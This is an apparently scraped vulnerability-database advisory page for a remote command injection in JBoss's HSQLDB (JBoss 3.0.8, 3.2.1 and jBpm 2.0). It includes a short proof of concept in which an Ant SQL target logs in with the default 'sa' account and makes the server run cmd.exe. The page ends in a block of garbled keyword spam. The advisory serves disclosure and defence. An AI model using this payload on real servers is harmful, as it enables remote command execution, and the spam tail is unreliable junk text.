exploits , vulnerabilities , articles , JBoss HSQLDB Remote Command Injection Vulnerability
| Title |
JBoss HSQLDB Remote Command Injection Vulnerability |
| Published |
2003-10-06-12:00AM |
| Updated |
2005-07-04-02:57PM |
| Class |
Unknown |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery is credited to Marc Schoenefeld. |
| Vulnerable |
jBpm.org jBpm 2.0
JBoss Group JBoss 3.2.1
JBoss Group JBoss 3.2.1
JBoss Group JBoss 3.0.8 |
| Not Vulnerable |
|
| Code |
The researchers who discovered this vulnerability have developed a working exploit which is not publicly available or known to be circulating in the wild.
The following proof of concept is available: <target name="cmdinject"> <sql classpath="hsqldb.jar" driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:hsql://${host}:${port}" userid="sa" password="" print = "true" > CREATE ALIAS COMPDEBUG FOR "org.apache.xml.utils.synthetic.JavaUtils.setDebug" CREATE ALIAS SETPROP FOR "java.lang.System.setProperty"; CREATE ALIAS COMPILE FOR "org.apache.xml.utils.synthetic.JavaUtils.JDKcompile";
CALL COMPDEBUG(true); CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe'); CALL COMPILE('/c REGEDIT.EXE',''); </sql> </target>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 05 Dec 2008 17:16:02 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
mambo Remo hack ftp sex org WWW.SEXyph ArticleBea Market xxvedio WWW.SEXyph www.sex fa sex pohtos Sabnor.Sex Www.xxx.se sex pohtos 200 /compo TightAucti Www.Video www.ayu az www.Sexgir N73 Softwa mambo Remo lo799l pakistani Fetishe the sims 2 Www.sexgir 200 /compo yyyy ms07-006 com_jcs/vi Dolphin Sm Dolphin Sm search.php search.php search.php search.php Zeroboard- zeroboard mambo Remo mambo Remo search.php search.php mambo Remo mambo Remo mambo Remo mambo Remo www.Sexgir sex amgl www ninfet Www.89sexe mambo Remo
|